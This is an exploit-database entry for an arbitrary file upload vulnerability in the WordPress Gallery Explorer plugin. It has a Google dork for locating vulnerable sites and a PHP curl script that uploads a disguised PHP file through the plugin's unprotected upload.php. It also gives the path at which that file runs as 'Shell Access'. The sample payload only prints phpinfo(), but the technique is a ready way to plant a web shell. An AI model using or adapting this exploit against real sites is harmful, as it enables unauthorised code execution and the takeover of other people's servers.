id: 18510
date: 06/08/2012
title: Wordpress Plugins - Gallery Explorer Arbitrary File Upload Vulnerability
author: Sammy FORGIT
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Sammy FORGIT member from Inj3ct0r Team             1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Wordpress Plugins - Gallery Explorer Arbitrary File Upload Vulnerability
# Version : no info
# Link : http://vm.xmlswf.com/wordpress-plugins/wordpress-image-gallery
# Plugins : http://vm.xmlswf.com/index.php?option=com_picsell&controller=prevsell&task=subemail&hrf=http___xmlswf.com/downloads/doc_download/241-wp-explorer-gallery
# Google Dork : inurl:/wp-content/plugins/wp-explorer-gallery
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php.gif"; 
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/wp-explorer-gallery/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/wp-explorer-gallery/js/swfupload/js/lo.php.gif

lo.php.gif
<?php
phpinfo();
?>



#  0day.today [2023-03-27]  #